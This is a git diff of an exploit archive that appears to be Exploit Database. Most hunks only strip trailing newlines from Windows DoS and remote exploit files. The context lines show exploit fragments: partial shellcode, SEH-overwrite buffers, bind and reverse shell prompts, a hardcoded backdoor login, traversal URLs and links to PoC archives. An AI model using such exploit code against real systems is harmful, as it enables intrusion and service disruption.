milw0rm.com [2008-10-01] +// milw0rm.com [2008-10-01] \ No newline at end of file diff --git a/platforms/windows/dos/665.c b/platforms/windows/dos/665.c index 186f0519e..fcb31f496 100755 --- a/platforms/windows/dos/665.c +++ b/platforms/windows/dos/665.c @@ -327,4 +327,4 @@ u_long resolv(char *host) { -// milw0rm.com [2004-11-29] +// milw0rm.com [2004-11-29] \ No newline at end of file diff --git a/platforms/windows/dos/6651.pl b/platforms/windows/dos/6651.pl index 003fd3a18..4c3371e16 100755 --- a/platforms/windows/dos/6651.pl +++ b/platforms/windows/dos/6651.pl @@ -40,4 +40,4 @@ $ftp->login($user,$pass) || die "Cannot login ", $ftp->message; $ftp->cwd($overflow); $ftp->quit; -# milw0rm.com [2008-10-02] +# milw0rm.com [2008-10-02] \ No newline at end of file diff --git a/platforms/windows/dos/6654.pl b/platforms/windows/dos/6654.pl index 9a5af3a65..8b43398ce 100755 --- a/platforms/windows/dos/6654.pl +++ b/platforms/windows/dos/6654.pl @@ -36,4 +36,4 @@ sock(); print " [+]Mirc should be down now, another little friend comming ?\r\n [+]Server Restarting\r\n"; } -# milw0rm.com [2008-10-02] +# milw0rm.com [2008-10-02] \ No newline at end of file diff --git a/platforms/windows/dos/6658.txt b/platforms/windows/dos/6658.txt index 10ca75345..f34058995 100755 --- a/platforms/windows/dos/6658.txt +++ b/platforms/windows/dos/6658.txt @@ -27,4 +27,4 @@ http://www.zeroscience.org https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6658.rar (2008-vba32_poc.rar) -# milw0rm.com [2008-10-03] +# milw0rm.com [2008-10-03] \ No newline at end of file diff --git a/platforms/windows/dos/6660.txt b/platforms/windows/dos/6660.txt index 474e4a34b..847d26bc9 100755 --- a/platforms/windows/dos/6660.txt +++ b/platforms/windows/dos/6660.txt @@ -13,4 +13,4 @@ quit 221 Goodbye, closing session. # now server DoS'ed -# milw0rm.com [2008-10-03] +# milw0rm.com [2008-10-03] \ No newline at end of file diff --git a/platforms/windows/dos/6668.txt b/platforms/windows/dos/6668.txt index 9ebecf37b..65dbd51b2 100755 --- a/platforms/windows/dos/6668.txt +++ b/platforms/windows/dos/6668.txt @@ -23,4 +23,4 @@ close($FILE); print "$file has been generated\n" print "Credit: suN8Hclf, www.dark-coders.pl" -# milw0rm.com [2008-10-04] +# milw0rm.com [2008-10-04] \ No newline at end of file diff --git a/platforms/windows/dos/667.c b/platforms/windows/dos/667.c index 96938e564..324b73592 100755 --- a/platforms/windows/dos/667.c +++ b/platforms/windows/dos/667.c @@ -258,4 +258,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-11-30] +// milw0rm.com [2004-11-30] \ No newline at end of file diff --git a/platforms/windows/dos/6671.c b/platforms/windows/dos/6671.c index 088571e68..3ae90f2b3 100755 --- a/platforms/windows/dos/6671.c +++ b/platforms/windows/dos/6671.c @@ -74,4 +74,4 @@ int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo) ; } -// milw0rm.com [2008-10-04] +// milw0rm.com [2008-10-04] \ No newline at end of file diff --git a/platforms/windows/dos/6672.txt b/platforms/windows/dos/6672.txt index 185607365..09203c815 100755 --- a/platforms/windows/dos/6672.txt +++ b/platforms/windows/dos/6672.txt @@ -95,4 +95,4 @@ int main(int argc, char *argv[]) Stay secure... -# milw0rm.com [2008-10-05] +# milw0rm.com [2008-10-05] \ No newline at end of file diff --git a/platforms/windows/dos/6673.txt b/platforms/windows/dos/6673.txt index fe2d9d517..d6b32dc0c 100755 --- a/platforms/windows/dos/6673.txt +++ b/platforms/windows/dos/6673.txt @@ -36,4 +36,4 @@ close($FILE); print "$file has been generated\n" print "Credit: suN8Hclf, www.dark-coders.pl" -# milw0rm.com [2008-10-05] +# milw0rm.com [2008-10-05] \ No newline at end of file diff --git a/platforms/windows/dos/671.c b/platforms/windows/dos/671.c index 65172346b..ebd74e530 100755 --- a/platforms/windows/dos/671.c +++ b/platforms/windows/dos/671.c @@ -476,4 +476,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-12-01] +// milw0rm.com [2004-12-01] \ No newline at end of file diff --git a/platforms/windows/dos/6716.pl b/platforms/windows/dos/6716.pl index d21cf6cd5..82d0886bb 100755 --- a/platforms/windows/dos/6716.pl +++ b/platforms/windows/dos/6716.pl @@ -214,4 +214,4 @@ binmode(out); print (out $gif); close(out); -# milw0rm.com [2008-10-09] +# milw0rm.com [2008-10-09] \ No newline at end of file diff --git a/platforms/windows/dos/6717.py b/platforms/windows/dos/6717.py index 7c306e9ea..5396f3644 100755 --- a/platforms/windows/dos/6717.py +++ b/platforms/windows/dos/6717.py @@ -56,4 +56,4 @@ else: sys.exit(0) -# milw0rm.com [2008-10-09] +# milw0rm.com [2008-10-09] \ No newline at end of file diff --git a/platforms/windows/dos/6719.py b/platforms/windows/dos/6719.py index 197452153..acbcc2c50 100755 --- a/platforms/windows/dos/6719.py +++ b/platforms/windows/dos/6719.py @@ -73,4 +73,4 @@ while x < 50: print "DoS Successful!" -# milw0rm.com [2008-10-10] +# milw0rm.com [2008-10-10] \ No newline at end of file diff --git a/platforms/windows/dos/672.c b/platforms/windows/dos/672.c index cd5701d76..1bf4ae3a7 100755 --- a/platforms/windows/dos/672.c +++ b/platforms/windows/dos/672.c @@ -491,4 +491,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-12-02] +// milw0rm.com [2004-12-02] \ No newline at end of file diff --git a/platforms/windows/dos/6732.txt b/platforms/windows/dos/6732.txt index 10d2cbd5a..3ceeade6b 100755 --- a/platforms/windows/dos/6732.txt +++ b/platforms/windows/dos/6732.txt @@ -14,4 +14,4 @@ You can run arbitary code. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6732.rar (2008-emf_MS08-046.rar) -# milw0rm.com [2008-10-12] +# milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/platforms/windows/dos/6738.py b/platforms/windows/dos/6738.py index 8356a9df6..1e455ebea 100755 --- a/platforms/windows/dos/6738.py +++ b/platforms/windows/dos/6738.py @@ -52,4 +52,4 @@ else: dos_it(hostname,username,passwd) sys.exit(0) -# milw0rm.com [2008-10-12] +# milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/platforms/windows/dos/6741.py b/platforms/windows/dos/6741.py index 5bf766850..5fe150868 100755 --- a/platforms/windows/dos/6741.py +++ b/platforms/windows/dos/6741.py @@ -37,4 +37,4 @@ try: except: print "- Unable to connect. exiting." -# milw0rm.com [2008-10-13] +# milw0rm.com [2008-10-13] \ No newline at end of file diff --git a/platforms/windows/dos/6742.py b/platforms/windows/dos/6742.py index bb4aafe63..2b286dd3c 100755 --- a/platforms/windows/dos/6742.py +++ b/platforms/windows/dos/6742.py @@ -53,4 +53,4 @@ else: dos_it(hostname,username,passwd) sys.exit(0) -# milw0rm.com [2008-10-13] +# milw0rm.com [2008-10-13] \ No newline at end of file diff --git a/platforms/windows/dos/6752.pl b/platforms/windows/dos/6752.pl index b284c7f9c..3f33ea05c 100755 --- a/platforms/windows/dos/6752.pl +++ b/platforms/windows/dos/6752.pl @@ -37,4 +37,4 @@ $ftp->quit; print "\nDone!\n"; -# milw0rm.com [2008-10-14] +# milw0rm.com [2008-10-14] \ No newline at end of file diff --git a/platforms/windows/dos/6753.py b/platforms/windows/dos/6753.py index d7aa5f3f8..b91c7e8b8 100755 --- a/platforms/windows/dos/6753.py +++ b/platforms/windows/dos/6753.py @@ -43,4 +43,4 @@ else: dos_it(hostname,username,passwd) sys.exit(0) -# milw0rm.com [2008-10-14] +# milw0rm.com [2008-10-14] \ No newline at end of file diff --git a/platforms/windows/dos/6756.txt b/platforms/windows/dos/6756.txt index 1245f9951..24f3501fc 100755 --- a/platforms/windows/dos/6756.txt +++ b/platforms/windows/dos/6756.txt @@ -289,4 +289,4 @@ DHoAn2Ygu5INc0u2P+tW+m+JZATCFXp0 =LilF -----END PGP SIGNATURE----- -# milw0rm.com [2008-10-14] +# milw0rm.com [2008-10-14] \ No newline at end of file diff --git a/platforms/windows/dos/6761.html b/platforms/windows/dos/6761.html index 615b95e2b..8fb4b8a31 100755 --- a/platforms/windows/dos/6761.html +++ b/platforms/windows/dos/6761.html @@ -17,4 +17,4 @@ target.PlainTextPassword = arg1 -# milw0rm.com [2008-10-16] +# milw0rm.com [2008-10-16] \ No newline at end of file diff --git a/platforms/windows/dos/677.txt b/platforms/windows/dos/677.txt index ac107a2b8..3932902b9 100755 --- a/platforms/windows/dos/677.txt +++ b/platforms/windows/dos/677.txt @@ -24,4 +24,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp When you copy or click this link, getright automaticly download and try to load crafted skin and will trigger buffer overflow -# milw0rm.com [2004-12-06] +# milw0rm.com [2004-12-06] \ No newline at end of file diff --git a/platforms/windows/dos/679.c b/platforms/windows/dos/679.c index 7afe73887..65a79e556 100755 --- a/platforms/windows/dos/679.c +++ b/platforms/windows/dos/679.c @@ -214,4 +214,4 @@ int main(int argc, char *argv[]) { } #endif -// milw0rm.com [2004-12-07] +// milw0rm.com [2004-12-07] \ No newline at end of file diff --git a/platforms/windows/dos/6800.pl b/platforms/windows/dos/6800.pl index 5249514ce..21b0de0ad 100755 --- a/platforms/windows/dos/6800.pl +++ b/platforms/windows/dos/6800.pl @@ -17,4 +17,4 @@ $rename = $sftp->rename($dos, "test"); $ssh2->disconnect(); exit; -# milw0rm.com [2008-10-22] +# milw0rm.com [2008-10-22] \ No newline at end of file diff --git a/platforms/windows/dos/6812.pl b/platforms/windows/dos/6812.pl index ece9cd542..a3d7b8b35 100755 --- a/platforms/windows/dos/6812.pl +++ b/platforms/windows/dos/6812.pl @@ -17,4 +17,4 @@ $realpath = $sftp->realpath($dos); $ssh2->disconnect(); exit; -# milw0rm.com [2008-10-22] +# milw0rm.com [2008-10-22] \ No newline at end of file diff --git a/platforms/windows/dos/6815.pl b/platforms/windows/dos/6815.pl index 089512d5e..3d770a95c 100755 --- a/platforms/windows/dos/6815.pl +++ b/platforms/windows/dos/6815.pl @@ -17,4 +17,4 @@ $rename = $sftp->opendir($dos); $ssh2->disconnect(); exit; -# milw0rm.com [2008-10-23] +# milw0rm.com [2008-10-23] \ No newline at end of file diff --git a/platforms/windows/dos/682.c b/platforms/windows/dos/682.c index 418aca12a..1dd190e7f 100755 --- a/platforms/windows/dos/682.c +++ b/platforms/windows/dos/682.c @@ -237,4 +237,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-12-13] +// milw0rm.com [2004-12-13] \ No newline at end of file diff --git a/platforms/windows/dos/6824.txt b/platforms/windows/dos/6824.txt index 3ac8bfdcb..660da2640 100755 --- a/platforms/windows/dos/6824.txt +++ b/platforms/windows/dos/6824.txt @@ -23,4 +23,4 @@ So play around a bit, you'll get it working reliably... poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6824.zip (2008-ms08-067.zip) -# milw0rm.com [2008-10-23] +# milw0rm.com [2008-10-23] \ No newline at end of file diff --git a/platforms/windows/dos/683.c b/platforms/windows/dos/683.c index 5f5a33dd9..803630071 100755 --- a/platforms/windows/dos/683.c +++ b/platforms/windows/dos/683.c @@ -240,4 +240,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2004-12-13] +// milw0rm.com [2004-12-13] \ No newline at end of file diff --git a/platforms/windows/dos/6832.html b/platforms/windows/dos/6832.html index 088f1c9c0..f1f6fd9c1 100755 --- a/platforms/windows/dos/6832.html +++ b/platforms/windows/dos/6832.html @@ -54,4 +54,4 @@ if (answ == true) -# milw0rm.com [2008-10-24] +# milw0rm.com [2008-10-24] \ No newline at end of file diff --git a/platforms/windows/dos/6834.c b/platforms/windows/dos/6834.c index a149e9094..467f8540e 100755 --- a/platforms/windows/dos/6834.c +++ b/platforms/windows/dos/6834.c @@ -85,4 +85,4 @@ return 0; //~~@KND http://pl.youtube.com/watch?v=KvFAx3ArmlE ~@~ -// milw0rm.com [2008-10-24] +// milw0rm.com [2008-10-24] \ No newline at end of file diff --git a/platforms/windows/dos/6838.rb b/platforms/windows/dos/6838.rb index ad85803d8..dbade3aa6 100755 --- a/platforms/windows/dos/6838.rb +++ b/platforms/windows/dos/6838.rb @@ -43,4 +43,4 @@ class Metasploit3 < Msf::Auxiliary end end -# milw0rm.com [2008-10-25] +# milw0rm.com [2008-10-25] \ No newline at end of file diff --git a/platforms/windows/dos/6863.pl b/platforms/windows/dos/6863.pl index cbc77bce0..78bcafdda 100755 --- a/platforms/windows/dos/6863.pl +++ b/platforms/windows/dos/6863.pl @@ -13,4 +13,4 @@ $tftp->put("test", "|"); exit; -# milw0rm.com [2008-10-29] +# milw0rm.com [2008-10-29] \ No newline at end of file diff --git a/platforms/windows/dos/687.c b/platforms/windows/dos/687.c index 3d54a8989..9e43a0dc5 100755 --- a/platforms/windows/dos/687.c +++ b/platforms/windows/dos/687.c @@ -199,4 +199,4 @@ void DisableDoSButton(HWND hDlg) EnableWindow(GetDlgItem(hDlg, IDHALT), 1); } -// milw0rm.com [2004-12-15] +// milw0rm.com [2004-12-15] \ No newline at end of file diff --git a/platforms/windows/dos/6926.pl b/platforms/windows/dos/6926.pl index bd9b5536b..acab1ba23 100755 --- a/platforms/windows/dos/6926.pl +++ b/platforms/windows/dos/6926.pl @@ -41,4 +41,4 @@ while (<$sock_in>){ } close($sock); -# milw0rm.com [2008-11-01] +# milw0rm.com [2008-11-01] \ No newline at end of file diff --git a/platforms/windows/dos/700.html b/platforms/windows/dos/700.html index 3b28df7b3..0eb9c9e90 100755 --- a/platforms/windows/dos/700.html +++ b/platforms/windows/dos/700.html @@ -18,4 +18,4 @@ List : BugTraq(SecurityFocus) Inject JavaScript -Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ . +Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ . \ No newline at end of file diff --git a/platforms/windows/remote/127.pl b/platforms/windows/remote/127.pl index 61741f126..bcbbb9589 100755 --- a/platforms/windows/remote/127.pl +++ b/platforms/windows/remote/127.pl @@ -108,4 +108,4 @@ print("[*] server closed.\n"); $daemon->close(); undef($daemon); -# milw0rm.com [2003-11-22] +# milw0rm.com [2003-11-22] \ No newline at end of file diff --git a/platforms/windows/remote/1277.c b/platforms/windows/remote/1277.c index ba38645f9..e33649aba 100755 --- a/platforms/windows/remote/1277.c +++ b/platforms/windows/remote/1277.c @@ -120,4 +120,4 @@ void main(int argc, char *argv[]) return; } -// milw0rm.com [2005-10-29] +// milw0rm.com [2005-10-29] \ No newline at end of file diff --git a/platforms/windows/remote/1279.pm b/platforms/windows/remote/1279.pm index 68ab0820d..930b3cc78 100755 --- a/platforms/windows/remote/1279.pm +++ b/platforms/windows/remote/1279.pm @@ -129,4 +129,4 @@ sub mrand { return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16) & 0x7fff); } -# milw0rm.com [2005-11-01] +# milw0rm.com [2005-11-01] \ No newline at end of file diff --git a/platforms/windows/remote/12834.py b/platforms/windows/remote/12834.py index 0ff19ac7d..fd1614060 100755 --- a/platforms/windows/remote/12834.py +++ b/platforms/windows/remote/12834.py @@ -145,4 +145,4 @@ if __name__ == "__main__": print "| XFTP 3.0 Build 0239 Long filename Buffer Overflow |" print "| coded by sinn3r twitter.com/_sinn3r |" print "|-----------------------------------------------------|" - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/130.c b/platforms/windows/remote/130.c index 16cea7f5f..6392ad987 100755 --- a/platforms/windows/remote/130.c +++ b/platforms/windows/remote/130.c @@ -326,4 +326,4 @@ int main(int argc,char *argv[]) -// milw0rm.com [2003-12-04] +// milw0rm.com [2003-12-04] \ No newline at end of file diff --git a/platforms/windows/remote/1313.c b/platforms/windows/remote/1313.c index 3ba01225a..a4784d630 100755 --- a/platforms/windows/remote/1313.c +++ b/platforms/windows/remote/1313.c @@ -258,4 +258,4 @@ int main(int argc, char **argv) { return 0; } -// milw0rm.com [2005-11-11] +// milw0rm.com [2005-11-11] \ No newline at end of file diff --git a/platforms/windows/remote/133.pl b/platforms/windows/remote/133.pl index 14cf523a9..a1f6211a8 100755 --- a/platforms/windows/remote/133.pl +++ b/platforms/windows/remote/133.pl @@ -243,4 +243,4 @@ exit; -# milw0rm.com [2003-12-15] +# milw0rm.com [2003-12-15] \ No newline at end of file diff --git a/platforms/windows/remote/1330.c b/platforms/windows/remote/1330.c index 2e6676d80..d11f7fa1f 100755 --- a/platforms/windows/remote/1330.c +++ b/platforms/windows/remote/1330.c @@ -232,4 +232,4 @@ int main(int argc, char *argv[]) { return 0; } -// milw0rm.com [2005-11-17] +// milw0rm.com [2005-11-17] \ No newline at end of file diff --git a/platforms/windows/remote/1332.pm b/platforms/windows/remote/1332.pm index 9e1301234..db1264e53 100755 --- a/platforms/windows/remote/1332.pm +++ b/platforms/windows/remote/1332.pm @@ -155,4 +155,4 @@ sub Exploit { 1; -# milw0rm.com [2005-11-20] +# milw0rm.com [2005-11-20] \ No newline at end of file diff --git a/platforms/windows/remote/135.c b/platforms/windows/remote/135.c index ea95f8e67..e3819226f 100755 --- a/platforms/windows/remote/135.c +++ b/platforms/windows/remote/135.c @@ -218,4 +218,4 @@ int main(int argc,char *argv[]) } -// milw0rm.com [2003-12-16] +// milw0rm.com [2003-12-16] \ No newline at end of file diff --git a/platforms/windows/remote/1352.cpp b/platforms/windows/remote/1352.cpp index 6c35412fe..f07fe497d 100755 --- a/platforms/windows/remote/1352.cpp +++ b/platforms/windows/remote/1352.cpp @@ -394,4 +394,4 @@ void main(int argc, char *argv[]) printf("Done!\n(*_*) Any shell?"); } -// milw0rm.com [2005-12-01] +// milw0rm.com [2005-12-01] \ No newline at end of file diff --git a/platforms/windows/remote/1357.diff b/platforms/windows/remote/1357.diff index 242a0ec57..1a28848bd 100755 --- a/platforms/windows/remote/1357.diff +++ b/platforms/windows/remote/1357.diff @@ -168,4 +168,4 @@ return( -1 ); } -// milw0rm.com [2005-12-04] +// milw0rm.com [2005-12-04] \ No newline at end of file diff --git a/platforms/windows/remote/136.pl b/platforms/windows/remote/136.pl index 2dd61b10d..79307986f 100755 --- a/platforms/windows/remote/136.pl +++ b/platforms/windows/remote/136.pl @@ -86,4 +86,4 @@ exit; -# milw0rm.com [2003-12-18] +# milw0rm.com [2003-12-18] \ No newline at end of file diff --git a/platforms/windows/remote/1365.pm b/platforms/windows/remote/1365.pm index 3102c6df2..64840c5e3 100755 --- a/platforms/windows/remote/1365.pm +++ b/platforms/windows/remote/1365.pm @@ -160,4 +160,4 @@ sub Exploit 1; -# milw0rm.com [2005-12-08] +# milw0rm.com [2005-12-08] \ No newline at end of file diff --git a/platforms/windows/remote/1366.pm b/platforms/windows/remote/1366.pm index 085c09c9f..f9a5eb23c 100755 --- a/platforms/windows/remote/1366.pm +++ b/platforms/windows/remote/1366.pm @@ -174,4 +174,4 @@ sub URLEncode { 1; -# milw0rm.com [2005-12-09] +# milw0rm.com [2005-12-09] \ No newline at end of file diff --git a/platforms/windows/remote/1374.pl b/platforms/windows/remote/1374.pl index 029a73d71..8b1cd0b69 100755 --- a/platforms/windows/remote/1374.pl +++ b/platforms/windows/remote/1374.pl @@ -55,4 +55,4 @@ while ($cli = $srv->accept()) { close($srv); -# milw0rm.com [2005-12-15] +# milw0rm.com [2005-12-15] \ No newline at end of file diff --git a/platforms/windows/remote/1375.pl b/platforms/windows/remote/1375.pl index 786aba14d..e4e265673 100755 --- a/platforms/windows/remote/1375.pl +++ b/platforms/windows/remote/1375.pl @@ -80,4 +80,4 @@ while (<$sock>) { print; } -# milw0rm.com [2005-12-16] +# milw0rm.com [2005-12-16] \ No newline at end of file diff --git a/platforms/windows/remote/1378.py b/platforms/windows/remote/1378.py index 936feab9e..67b659bc7 100755 --- a/platforms/windows/remote/1378.py +++ b/platforms/windows/remote/1378.py @@ -133,4 +133,4 @@ s.close() print "[+] Done\n" print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n" -# milw0rm.com [2005-12-19] +# milw0rm.com [2005-12-19] \ No newline at end of file diff --git a/platforms/windows/remote/1380.py b/platforms/windows/remote/1380.py index e5713535c..242d27d39 100755 --- a/platforms/windows/remote/1380.py +++ b/platforms/windows/remote/1380.py @@ -129,4 +129,4 @@ s.close() print "[+] Done\n" print "[+] Connect to port 4444 on victim IP - Muhahaha!\n" -# milw0rm.com [2005-12-20] +# milw0rm.com [2005-12-20] \ No newline at end of file diff --git a/platforms/windows/remote/13808.txt b/platforms/windows/remote/13808.txt index cfb733708..d5dc5e6e9 100755 --- a/platforms/windows/remote/13808.txt +++ b/platforms/windows/remote/13808.txt @@ -446,4 +446,4 @@ hcp:// has been broken a few times over the years, for example: The current design is actually pretty sound, I'm sure Microsoft are dissapointed they missed this flaw. In their defense, I think there's a good -chance I would have also missed this in code review. +chance I would have also missed this in code review. \ No newline at end of file diff --git a/platforms/windows/remote/1381.pm b/platforms/windows/remote/1381.pm index 7182e2506..36ac5ff87 100755 --- a/platforms/windows/remote/1381.pm +++ b/platforms/windows/remote/1381.pm @@ -129,4 +129,4 @@ sub Exploit { return; } -# milw0rm.com [2005-12-20] +# milw0rm.com [2005-12-20] \ No newline at end of file diff --git a/platforms/windows/remote/13818.txt b/platforms/windows/remote/13818.txt index 00909470a..10d0f9da7 100755 --- a/platforms/windows/remote/13818.txt +++ b/platforms/windows/remote/13818.txt @@ -23,4 +23,4 @@ http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%20 http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%20 -These three attempts will overwrite memory registers with different parts of the internal path based on where they try and traverse to. +These three attempts will overwrite memory registers with different parts of the internal path based on where they try and traverse to. \ No newline at end of file diff --git a/platforms/windows/remote/13903.py b/platforms/windows/remote/13903.py index 9199290be..4923af603 100755 --- a/platforms/windows/remote/13903.py +++ b/platforms/windows/remote/13903.py @@ -113,5 +113,4 @@ s.send(payload) s.close() print "Check your netcat listening on TCP port 55555 for reverse connect shell\n" -print "%s pwned!" % (ips) - +print "%s pwned!" % (ips) \ No newline at end of file diff --git a/platforms/windows/remote/1391.pm b/platforms/windows/remote/1391.pm index f6a47f663..4ab686fd6 100755 --- a/platforms/windows/remote/1391.pm +++ b/platforms/windows/remote/1391.pm @@ -345,4 +345,4 @@ Best Regards -- san -# milw0rm.com [2005-12-27] +# milw0rm.com [2005-12-27] \ No newline at end of file diff --git a/platforms/windows/remote/13932.py b/platforms/windows/remote/13932.py index 45f570946..1d6bc7c0e 100755 --- a/platforms/windows/remote/13932.py +++ b/platforms/windows/remote/13932.py @@ -34,4 +34,4 @@ print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write ) # print ftp.storbinary( 'STOR ' + filename, f ) # f.close() -ftp.quit() +ftp.quit() \ No newline at end of file diff --git a/platforms/windows/remote/1408.pl b/platforms/windows/remote/1408.pl index babf39730..dd0b7ee72 100755 --- a/platforms/windows/remote/1408.pl +++ b/platforms/windows/remote/1408.pl @@ -87,4 +87,4 @@ print "[+] Done. Now check for bind shell on $ip:4444!"; close($sock); -# milw0rm.com [2006-01-07] +# milw0rm.com [2006-01-07] \ No newline at end of file diff --git a/platforms/windows/remote/1413.c b/platforms/windows/remote/1413.c index a64c8817a..82814a88d 100755 --- a/platforms/windows/remote/1413.c +++ b/platforms/windows/remote/1413.c @@ -374,4 +374,4 @@ int main() fclose(stream); } -// milw0rm.com [2006-01-12] +// milw0rm.com [2006-01-12] \ No newline at end of file diff --git a/platforms/windows/remote/1414.pl b/platforms/windows/remote/1414.pl index a1f8e7925..4d05ba021 100755 --- a/platforms/windows/remote/1414.pl +++ b/platforms/windows/remote/1414.pl @@ -90,4 +90,4 @@ print $socket $sipinvite; close($socket); -# milw0rm.com [2006-01-12] +# milw0rm.com [2006-01-12] \ No newline at end of file diff --git a/platforms/windows/remote/1417.pl b/platforms/windows/remote/1417.pl index bbc901509..cf182bfda 100755 --- a/platforms/windows/remote/1417.pl +++ b/platforms/windows/remote/1417.pl @@ -53,4 +53,4 @@ $ftp = Net::FTP->new("$target", and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message; $ftp->quit; -# milw0rm.com [2006-01-14] +# milw0rm.com [2006-01-14] \ No newline at end of file diff --git a/platforms/windows/remote/14180.py b/platforms/windows/remote/14180.py index bda928c84..58c2a0e39 100755 --- a/platforms/windows/remote/14180.py +++ b/platforms/windows/remote/14180.py @@ -78,4 +78,4 @@ data = r.read() print data c.close() -print "\nDone\n" +print "\nDone\n" \ No newline at end of file diff --git a/platforms/windows/remote/14181.py b/platforms/windows/remote/14181.py index d56a8d2a6..7ea902c01 100755 --- a/platforms/windows/remote/14181.py +++ b/platforms/windows/remote/14181.py @@ -74,4 +74,4 @@ data = r.read() print data c.close() -print "\nDone\n" +print "\nDone\n" \ No newline at end of file diff --git a/platforms/windows/remote/14182.py b/platforms/windows/remote/14182.py index dd52b2606..f56d8374c 100755 --- a/platforms/windows/remote/14182.py +++ b/platforms/windows/remote/14182.py @@ -86,4 +86,4 @@ data = r.read() print data c.close() -print "\nDone\n" +print "\nDone\n" \ No newline at end of file diff --git a/platforms/windows/remote/14194.cpp b/platforms/windows/remote/14194.cpp index 2dead2820..69a98763b 100755 --- a/platforms/windows/remote/14194.cpp +++ b/platforms/windows/remote/14194.cpp @@ -189,4 +189,4 @@ int main(int argc, char *argv[]) fprintf(stderr, "%s\n", "[*] Wait 2 minutes and connect with r00t / r00tr00t123"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/14195.html b/platforms/windows/remote/14195.html index e06018735..ba138eec0 100755 --- a/platforms/windows/remote/14195.html +++ b/platforms/windows/remote/14195.html @@ -71,4 +71,4 @@ exploit = buffer + nseh + seh + nops + sc + junk target.Get exploit - + \ No newline at end of file diff --git a/platforms/windows/remote/1420.c b/platforms/windows/remote/1420.c index b529cb4b9..d3765847f 100755 --- a/platforms/windows/remote/1420.c +++ b/platforms/windows/remote/1420.c @@ -1396,4 +1396,4 @@ sc_end: } } -// milw0rm.com [2006-01-15] +// milw0rm.com [2006-01-15] \ No newline at end of file diff --git a/platforms/windows/remote/14200.html b/platforms/windows/remote/14200.html index bf10f6c6b..3682708bc 100755 --- a/platforms/windows/remote/14200.html +++ b/platforms/windows/remote/14200.html @@ -61,4 +61,4 @@ sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ exploit = buffer + eip + nops + sc + junk target.FullPath = exploit - + \ No newline at end of file diff --git a/platforms/windows/remote/1421.cpp b/platforms/windows/remote/1421.cpp index c216ef86d..d9aad6d22 100755 --- a/platforms/windows/remote/1421.cpp +++ b/platforms/windows/remote/1421.cpp @@ -246,4 +246,4 @@ DWORD WINAPI SendShellcode(LPVOID lpParam) { return NULL; } -// milw0rm.com [2006-01-16] +// milw0rm.com [2006-01-16] \ No newline at end of file diff --git a/platforms/windows/remote/14222.py b/platforms/windows/remote/14222.py index b97da286d..9358e3e65 100755 --- a/platforms/windows/remote/14222.py +++ b/platforms/windows/remote/14222.py @@ -249,4 +249,4 @@ conn, addr = s.accept() print '[*] Received connection from: ', addr conn.send(sploit) -conn.close +conn.close \ No newline at end of file diff --git a/platforms/windows/remote/14248.py b/platforms/windows/remote/14248.py index 95d34fb4f..734e347d7 100755 --- a/platforms/windows/remote/14248.py +++ b/platforms/windows/remote/14248.py @@ -224,4 +224,4 @@ ret+='calc' #a program to execute packet=pack_login(junk+xored_esp+ret, False) send_and_run(packet) -print '[+] Packet has been sent. The server should be DoSed or a code should be executed.' +print '[+] Packet has been sent. The server should be DoSed or a code should be executed.' \ No newline at end of file diff --git a/platforms/windows/remote/14269.html b/platforms/windows/remote/14269.html index 5b3a0ced3..a66f55e8f 100755 --- a/platforms/windows/remote/14269.html +++ b/platforms/windows/remote/14269.html @@ -45,4 +45,4 @@ junk = string(12820, "B") exploit = buffer + next_seh + seh + nops + shellcode + junk target.RasIsConnected exploit - + \ No newline at end of file diff --git a/platforms/windows/remote/14275.txt b/platforms/windows/remote/14275.txt index ea9c97132..d41890863 100755 --- a/platforms/windows/remote/14275.txt +++ b/platforms/windows/remote/14275.txt @@ -11,4 +11,4 @@ You can test by browsing to http://krash.in/real-exp/exploit.ram https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14275.tar (rp-0day-08-07-2010.tar) ---webDEViL +--webDEViL \ No newline at end of file diff --git a/platforms/windows/remote/14321.html b/platforms/windows/remote/14321.html index 53effc4ba..4c4f483b3 100755 --- a/platforms/windows/remote/14321.html +++ b/platforms/windows/remote/14321.html @@ -62,4 +62,4 @@ arg4=1 exploit = buffer1 + next_seh + seh + nops + sc target.DrawIcon exploit ,arg2 ,arg3 ,arg4 - + \ No newline at end of file diff --git a/platforms/windows/remote/14400.py b/platforms/windows/remote/14400.py index a979f288b..baebee055 100755 --- a/platforms/windows/remote/14400.py +++ b/platforms/windows/remote/14400.py @@ -78,4 +78,4 @@ try: except: print "[+] +++Exploit Successful+++ ^_^" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/14402.py b/platforms/windows/remote/14402.py index 7f417e89c..8879d8517 100755 --- a/platforms/windows/remote/14402.py +++ b/platforms/windows/remote/14402.py @@ -48,4 +48,4 @@ def ExploitEasyFTP(target): target = sys.argv[1] -ExploitEasyFTP(target) +ExploitEasyFTP(target) \ No newline at end of file diff --git a/platforms/windows/remote/14416.html b/platforms/windows/remote/14416.html index 7b5ee3f9a..f5ecd3403 100755 --- a/platforms/windows/remote/14416.html +++ b/platforms/windows/remote/14416.html @@ -68,4 +68,4 @@ Vulnerable Property: Tags - + \ No newline at end of file diff --git 